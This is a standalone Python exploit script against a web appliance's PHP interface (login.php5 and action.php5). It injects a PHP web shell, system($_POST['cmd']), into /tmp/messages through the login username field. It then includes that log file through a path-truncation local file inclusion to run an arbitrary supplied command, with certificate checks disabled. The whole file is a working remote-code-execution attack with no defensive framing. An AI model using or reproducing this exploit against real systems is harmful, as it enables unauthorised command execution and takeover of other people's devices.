#!/usr/bin/env python3
import requests
import sys
import urllib3
urllib3.disable_warnings()

if len(sys.argv) < 3:
    print("%s <host> <payload>" % sys.argv[0])
    sys.exit(1)

host = sys.argv[1]
payload = sys.argv[2]

# Poison /tmp/messages
data = {
    "login_auth": 0,
    "miniHiveUI": 1,
    "authselect": "Name/Password",
    "userName": "<?php system($_POST['cmd']); exit(0);?>",
    "password": "a"
}
requests.post('https://%s/login.php5' % host, data=data, verify=False)

# Trigger LFI through path truncation
data = {
    "_page": "a" + "/.."*8 + "/"*4041 + "/tmp/messages",
    "cmd": payload
}
reply = requests.post('https://%s/action.php5?_action=list&debug=true' % host, data=data, verify=False)
print(reply.text)